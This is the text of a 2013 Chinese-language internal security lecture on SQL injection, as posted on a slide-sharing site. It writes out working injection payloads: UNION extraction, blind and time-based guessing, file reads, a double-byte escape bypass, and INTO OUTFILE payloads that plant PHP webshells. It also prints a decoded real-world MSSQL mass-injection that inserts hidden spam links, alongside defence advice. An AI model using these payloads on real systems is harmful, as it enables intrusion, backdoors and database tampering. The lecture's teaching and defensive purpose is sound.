Download as PDF, PPTX
![SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(str,len) 返回某字串開頭開始的len最左字串
RIGHT(str,len) 返回某字串開頭開始的len最右字串
SUBSTRING(str,pos,len) 取得某字串的子字串
SUBSTR(str,pos,len) 為SUBSTRING同義詞
MID(str,pos,len) 為SUBSTRING同義詞
CHAR(N,... [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字,則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1,str2,...) 返回值為所有連接參數產生的字串
NAME_CONST(name,value) 返回一個定值。當月來產生一個結果集合列時,
NAME_CONST()促使該列使用定義名稱
5.1後限制僅能使用CONST的變數
…](https://image.slidesharecdn.com/20130307taien-130312203220-phpapp01/85/I-8-320.jpg)
![SQL Injection攻擊技巧 – 讀寫檔案
• 讀資料寫檔案
– http://www.hackdemo.com/getUser.php?id=1+into+outfile+'D:/W
ebsite/www.hackdemo.com/member.txt'
• 寫後門
– http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNIO
N+SELECT+%22%3C?php+system($_GET['cmd']);?%3E%22,2,3,4+i
nto+outfile+'D:/Website/www.hackdemo.com/cmd.php'](https://image.slidesharecdn.com/20130307taien-130312203220-phpapp01/85/I-15-320.jpg)
![SQL Injection攻擊技巧 – 寫檔案(無法繞過引號
限制)
1. 找到phpMyAdmin
2. 遠端MySQL
mysql> use xssdb;
mysql> set
@a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027;
mysql> prepare cmd from @a;
mysql> execute cmd;
@a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile 'C:/shell.php';
寫入檔案為
<?php @eval($_POST['cmd']);?>](https://image.slidesharecdn.com/20130307taien-130312203220-phpapp01/85/I-24-320.jpg)
![MSSQL實際案例 - 116jurist.ru自動化注入解碼
(4/4)
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+']
like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
•
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
•
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET
['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}<
/style><div class=a4tw><a href=http://116jurist.ru>þðèäè÷åñêèå-óñëóãè-ìîñêâà</a></div>'' ') FETCH NEXT FROM
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor](https://image.slidesharecdn.com/20130307taien-130312203220-phpapp01/85/I-37-320.jpg)
Uploaded byTaien Wang
伺服器端攻擊與防禦I
本文件介绍了服务器端攻击与防御的多种技巧,重点讲解了 SQL 注入攻击的原理及防护策略。内容涉及常见的攻击形式,包括 SQL 注入、盲注入、时间延迟注入等,并提供了实际攻击示例和相应的预防措施。我们还讨论了 SQL 列截断漏洞和其它相关的安全最佳实践。
![[MOPCON2019]從零建立商業技術團隊](https://cdn.slidesharecdn.com/ss_thumbnails/mopcon2019-191021125313-thumbnail.jpg?width=640&height=640&fit=bounds)
![[ModernWeb2019] Taien - 高併發的道與術](https://cdn.slidesharecdn.com/ss_thumbnails/modernweb2019taienstrategyandtacticsofhighconcurrency-190830113607-thumbnail.jpg?width=640&height=640&fit=bounds)
![[ModernWeb2018] Web3.0 區塊鏈 DApp + 智能合約開發:你必要挑戰的坑坑洞洞](https://cdn.slidesharecdn.com/ss_thumbnails/web3-v1-180718031506-thumbnail.jpg?width=640&height=640&fit=bounds)
伺服器端攻擊與防禦I
- 1. Taien內部資安講座 IV 伺服器端攻擊與防禦I 2013.03.07 @Hiiir Inc. Taien Wang<taien_wang@hiiir.com> 英屬維京群島商時間軸科技股份有限公司新創事業部
- 2. 1020307 伺服器端攻擊與防禦I - 大綱 •SQL Injection – 攻擊技巧 • 判斷是否有弱點 • 常用函數 • UNION • 繞過跳脫字元 – ASCII編碼 – 16進位 – 雙位元組跳脫技巧 – SQL Blind Injection • Time-Based Blind SQL Injection – SQL Column Truncation
- 3. SQL Injection –簡介 • Rfp, “NT Web Technology Vulnerabilities”, Phrack, 1998 • 維京百科 – SQL攻擊(SQL injection,中國大陸稱作SQL注入攻擊),簡稱隱碼 攻擊,是發生於應用程式之資料庫層的安全漏洞。簡而言之,是在輸入 的字串之中夾帶SQL指令,在設計不良的程式當中忽略了檢查,那麼這 些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行, 因此遭到破壞。
- 4. SQL Injection -範例資料庫的資料
- 5. SQL Injection -請試想這段程式碼有什麼問題
- 6. SQL Injection攻擊技巧 –簡易嘗試是否有弱點 • http://www.hackdemo.com/getUser.php?id=1 • http://www.hackdemo.com/getUser.php?id= • http://www.hackdemo.com/getUser.php?id=999999.9 • http://www.hackdemo.com/getUser.php?id=1' • http://www.hackdemo.com/getUser.php?id=1+and+1=1 • http://www.hackdemo.com/getUser.php?id=1+and+1=2
- 7. SQL Injection攻擊技巧 –空格與註解 • 關鍵字大小寫混雜 • 註解 #(%23), /*, -- • 空格 +, /**/ URL編碼 用途 %09 horizontal tab %0a line feed %0b vertical tab %0c form feed %0d carriage return %20 space
- 8. SQL Injection攻擊技巧 -猜解資料常用函數 函數 功能 LENGTH(str) 返回字串長度 LEFT(str,len) 返回某字串開頭開始的len最左字串 RIGHT(str,len) 返回某字串開頭開始的len最右字串 SUBSTRING(str,pos,len) 取得某字串的子字串 SUBSTR(str,pos,len) 為SUBSTRING同義詞 MID(str,pos,len) 為SUBSTRING同義詞 CHAR(N,... [USING charset]) 其返回值為一個包含這些整數代碼值的字串 HEX(N_or_S) 如果N或S是一個數字,則返回16進位N的字串 ASCII(str) 返回值為字串str的最左邊數值 CONCAT(str1,str2,...) 返回值為所有連接參數產生的字串 NAME_CONST(name,value) 返回一個定值。當月來產生一個結果集合列時, NAME_CONST()促使該列使用定義名稱 5.1後限制僅能使用CONST的變數 …
- 9. SQL Injection攻擊技巧 -相關系統函數 函數 功能 LOAD_FILE(file_name) 讀取檔案 INTO OUTFILE '/var/www/html/back.php' 輸出檔案 VERSION() 返回MySQL伺服器版本 DATABASE() 目前使用資料庫名稱 USER() 返回目前MySQL用戶與主機名稱 SYSTEM_USER() 與USER()同義 SESSION_USER() 與USER()同義 SCHEMA() 與DATABASE()同義 CURRENT_USER() 返回當前被驗證的用戶名與主機名組合,可能與 USER()值有所不同 @@DATADIR 讀取資料庫路徑 @@BASEDIR 資料庫安裝路徑 …
- 10. SQL Injection攻擊技巧 –讀檔注意事項 • 欲讀取文件必須在伺服器上 • 必須指定文件完整的路徑 • 必須有權限讀取並且文件必須完全可讀 • 欲讀取文件必須小於 max_allowed_packet
- 11. SQL Injection攻擊技巧 –UNION • PHP+MySQL未支援多指令查詢,利用聯集查詢UNION – 有弱點的SQL語法,沒有引號的參數(以PHP為例) • SELECT * FROM `member` WHERE `id` =$id – 沒有引號攻擊範例 • http://www.hackdemo.com/getUser.php?id=1+and+1=2+UNI ON+SELECT+1,2,3,4# – 實際執行語法 • SELECT * FROM `member` WHERE `id` =1 AND 1=2 UNION SELECT 1,2,3,4#
- 12. SQL Injection攻擊技巧 –UNION • PHP+MySQL未支援多指令查詢,利用聯集查詢UNION • 有弱點的SQL語法,有引號的參數(以PHP為例) • SELECT * FROM `member` WHERE `name` like '" . $name . "%' • 沒有引號攻擊範例 • http://www.hackdemo.com/searchUser.php?name=h%'/**/a nd/**/1=2/**/union/**/select/**/1,2,3,user()%23 • 實際執行語法 • SELECT * FROM `member` WHERE `name` like 'h%'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()#%'
- 13. SQL Injection攻擊技巧 -成功控制語法
- 14. SQL Injection攻擊技巧 –猜解資料 • 取得長度 – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PA SSWORD)=1# – … – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PA SSWORD)=7# • 猜解資料 – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PAS SWORD,1)='a'# – … – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PAS SWORD,1)='w'#
- 15. SQL Injection攻擊技巧 –讀寫檔案 • 讀資料寫檔案 – http://www.hackdemo.com/getUser.php?id=1+into+outfile+'D:/W ebsite/www.hackdemo.com/member.txt' • 寫後門 – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNIO N+SELECT+%22%3C?php+system($_GET['cmd']);?%3E%22,2,3,4+i nto+outfile+'D:/Website/www.hackdemo.com/cmd.php'
- 16.
- 17. SQL Blind Injection •SQL盲注入(SQL Blind Injection),也是一種SQL Injection的類型。一般 SQL Injection仰賴出錯的相關訊息建構攻擊語法,而盲注入完全仰賴語法 執行的對(true)錯(false) • SQL Blind Injection – 一般盲注入 – Time-Based Blind SQL Injection
- 18. Time-Based Blind SQLInjection (1/2) • 透過時間的延遲來判斷該SQL語法是否執行成功 • 技巧 – 內建函數 • BENCHMARK(COUNT, EXPR) • SLEEP(seconds) – MySQL >= 5 – 創建較花時間的語法(heavy queries)
- 19. Time-Based Blind SQLInjection - 使用 heavy queries (2/2)
- 20. Time-Based Blind SQLInjection - 透過時間 延遲猜解資料庫名稱 • http://www.hackdemo.com/getUserLash.php?id=1+UNION+SEL ECT+IF(SUBSTRING(db,1,1)=CHAR(1),BENCHMARK(5000000,E NCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABAS E()+as+db)+AS+tb • … • http://www.hackdemo.com/getUserLash.php?id=1+UNION+SEL ECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000, ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABA SE()+as+db)+AS+tb
- 21. SQL Injection攻擊技巧 -繞過跳脫字元 • ACSII編碼 – ASCII(), CHAR() – 單一 • CHAR(68) – 多個 • CHAR(68, 58, 92) • 16進位編碼 – HEX() – 0x443A5C • 雙位元組跳脫技巧
- 22. SQL Injection攻擊技巧 -猜解資料(繞過跳脫) • 猜解欄位 – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNIO N+SELECT+1,2,3,4+FROM+user-- – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNIO N+SELECT+1,2,3,4+FROM+member-- • 猜解欄位資料 – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT (PASSWORD,1)=char(0) – … – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT (PASSWORD,1)=char(119)
- 23. SQL Injection攻擊技巧 -讀取資料(繞過跳脫) • 讀資料寫檔案 – http://www.hackdemo.com/getUserLash.php?id=1+AND+1= 2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98, 115,105,116,101,92,119,119,119,46,104,97,99,107,100,101 ,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46 ,112,104,112))-- – http://www.hackdemo.com/getUserLash.php?id=1+AND+1= 2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974 655C7777772E6861636B64656D6F2E636F6D5C636F6E6669 672E706870)--
- 24. SQL Injection攻擊技巧 –寫檔案(無法繞過引號 限制) 1. 找到phpMyAdmin 2. 遠端MySQL mysql> use xssdb; mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323 435463530344635333534354232373633364436343237354432393342334633452066726F6D 20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70 687027; mysql> prepare cmd from @a; mysql> execute cmd; @a為 select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'; 寫入檔案為 <?php @eval($_POST['cmd']);?>
- 25. SQL Injection攻擊技巧 -雙位元組跳脫技巧 (1/3) • 透過注入的編碼與反斜線/(%5c)重組產生:字',繞過跳脫字元的限制 • 情境 – 跳脫字元處理 • addslashes • mysql_escape_string • php.in – magic_quotes_gpc 開啟 – 採用BIG5或GBK編碼 • set names gbk, set names big5
- 26. SQL Injection攻擊技巧 -雙位元組跳脫技巧 (2/3) • 中文語系文字以兩個位元組表示 – Big5: • 高位元組: 0x81-0xFE;低位元組: 0x40-0x7E、0xA1-0xFE – GBK : • 前位元組: 0x81-0xFE;後位元組: 0x40-0x7E – GB2312: • 前位元組: 0xB0-0xF7;後位元組: 0xA0-0xFE – 攻擊字元: %BF, %CC, %D5…
- 27. SQL Injection攻擊技巧 -雙位元組跳脫技巧(3/3) • 有引號的參數繞過跳脫 – http://www.hackdemo.com/searchUserLash.php?name=h% %B5'+AND+1=2+UNION+SELECT+1,2,3,4%23 – http://www.hackdemo.com/searchUserLash.php?name=h% %CC'+AND+1=2+UNION+SELECT+1,2,3,4%23 – http://www.hackdemo.com/searchUserLash.php?name=h% %d5'+AND+1=2+UNION+SELECT+1,2,3,4%23
- 28. SQL Column Truncation– 簡介(1/3) • MySQL中 SQL mode – 沒有開啟 STRICT_ALL_TABLES • 使用者新增超過長度的資料會出現警告提示 • 但資料還是會新增 – 開啟 STRICT_ALL_TABLES • 使用者新增超過長度的資料會出現提示 • 出現ERROR 1406, 該資料不會成功新增 • 慘案 – 2008-09-07 • WordPress 2.6.1 SQL Column Truncation Vulnerability
- 29. SQL Column Truncation- 效果(2/3)
- 30. SQL Column Truncation- 防禦方案(3/3) • 在字串中不該有空白的主動清除 – 如帳號類資訊 • 在 SELECT 資料時加上 BINARY 參數 • 在 MySQL 設定預設以 BINARY 查詢 • 在 MySQL 開啟 STRICT_ALL_TABLES – 超過欄位長度會出現 ERROR 而非出現 WARNING – 新增資料為避免發生錯誤, 可能需在新增修改加入額外檢查
- 31. SQL Injection –延伸思考 • INSERT 與 UPDATE 的攻擊可能發生嗎? • NoSQL 沒有 SQL Injection? • 其他攻擊利用 – Deep Blind Injection – Error-Based Injection • Duplicate Error • Function – information_schema – 使用者自訂函數(User-Defined Functions) – 觸發(Trigger)
- 32. SQL Injection –自動化工具 • Havij • Pangolin • w3af • Jsky • SQLmap • …
- 33. 正確地防禦SQL Injection • 最低權限原則 •使用預先編譯敘述 • 使用預存函數 • 使用UTF8避免使用BIG5或GBK • 檢查資料型態與強制轉型 – bool settype(mixed &$var, string $type) – intval, doubleval... • 使用安全函數 – OWASP ESAPI • MySQLCodec
- 34. MSSQL實際案例 - 116jurist.ru自動化注入(1/4) •2012.12.xx 10:03:31 • Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66 66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204 445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142 4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4 12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865 726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74 657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448 3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162 6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434 8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040 46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275 d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249 4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b 40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652 4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43 7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
- 35. MSSQL實際案例 - 116jurist.ru自動化注入(2/4) •2012.12.xx 10:03:33 • Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66 66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204 445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142 4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4 12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865 726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74 657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448 3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162 6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434 8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040 46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272 b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920 4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544 f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616 26c655f437572736f72+as+varchar(8000))+exec(@s)--
- 36. MSSQL實際案例 - 116jurist.ru自動化注入(3/4) •2012.12.xx 10:03:44 • Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66 66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204 445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142 4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4 12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865 726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74 657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448 3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162 6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434 8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040 46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275 d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b 275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746 53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e 3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275 203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455 44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c 4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc har(8000))+exec(@s)--
- 37. MSSQL實際案例 - 116jurist.ru自動化注入解碼 (4/4) •set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor • • set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor • • set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}< /style><div class=a4tw><a href=http://116jurist.ru>þðèäè÷åñêèå-óñëóãè-ìîñêâà</a></div>'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
- 38. 參考資料 • 吳翰清, 網路竟然這麼危險(白帽子讲Web安全),2012 • MySQL, String Functions, 5.1 • MySQL, Miscellaneous Functions, 5.1 • MySQL/PHP 对单引号转义时load_file/outfile 生成一句话 • Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL • Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008